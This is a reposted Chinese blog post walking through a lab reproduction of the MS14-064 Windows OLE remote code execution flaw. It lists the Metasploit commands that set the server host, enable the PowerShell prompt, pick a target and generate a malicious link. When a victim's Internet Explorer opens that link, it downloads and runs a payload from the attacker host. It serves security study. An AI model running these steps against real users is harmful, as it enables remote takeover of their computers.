0


MS14-064(OLE远程代码执行漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


文章目录

一、原理

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。
生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。

二、实验环境

攻击机:kali ip:192.168.204.128
靶机:win10 ip:192.168.204.132
工具kali MSF

三、漏洞复现

1、打开kali 进入MSF框架
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nZbZmCAj-1676102178265)(https://secure2.wostatic.cn/static/nGSGP9xvxeWPQ7hyD8oFDP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aPyT3ajMo5s5J8csGFDXZD-0-37e1c01ea05c3679b7773f43336dfa55#id=u4Eej&originHeight=455&originWidth=889&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

2、找到MS14-064漏洞

search ms14-064
use 0

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dTdlDB6m-1676102178265)(https://secure2.wostatic.cn/static/vSjJ9yzxDyNfdPwairQYmP/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-aFkaivMPKu4HPLNFsyLmF1-0-7e87130296de71318f687cf7494375f7#id=mooVg&originHeight=386&originWidth=890&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

3、查看当前模块参数

show options

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2TxxsIes-1676102178266)(https://secure2.wostatic.cn/static/wQwFm4ZbUEuJM6PazRot4B/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-4Q8eQFX8TQnueitmCS4e65-0-9deb8ac62a1a0568d71437c851b7982b#id=EuouZ&originHeight=575&originWidth=940&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

4、设置参数

set AllowPowershellPrompt true
set srvhost 192.168.204.128

//设置服务器地址ip
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ucsooNsR-1676102178267)(https://secure2.wostatic.cn/static/bPcbbRkC1Sp8JRUEo1imcU/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-3xEqkZ3vPJPYsb4js9GXFu-0-9508095ec5c244833b5a376258dcfd50#id=FPvA9&originHeight=97&originWidth=762&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

5、查看和设置可攻击目标

show targets
set targets 1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bfVT54dv-1676102178268)(https://secure2.wostatic.cn/static/7qvxRDsxo5bbgauWhAbMww/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-6w3LecAdKpFTrSz46sT1ky-0-caa4f9f9399c382ffd790c5863a1d396#id=ohp3v&originHeight=158&originWidth=859&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

6、执行获得恶意链接

run
exploit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NIKyr3k0-1676102178268)(https://secure2.wostatic.cn/static/nXHa5z36vCKCRaHUDZaqwe/%E5%9B%BE%E7%89%87.png?auth_key=1673873689-26yRxSZpbNbJgLbS5KpcPe-0-4ec74a005d1c80fcc954491243056c45#id=hhAX0&originHeight=101&originWidth=682&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

恶意链接:

[http://192.168.204.128:8080/9hA6xv](http://192.168.204.128:8080/9hA6xv)
标签: 安全 网络 web安全

本文转载自: https://blog.csdn.net/qq_53517370/article/details/128984794
版权归原作者 就你叫Martin? 所有, 如有侵权,请联系我们删除。

“MS14-064(OLE远程代码执行漏洞复现)”的评论:

还没有评论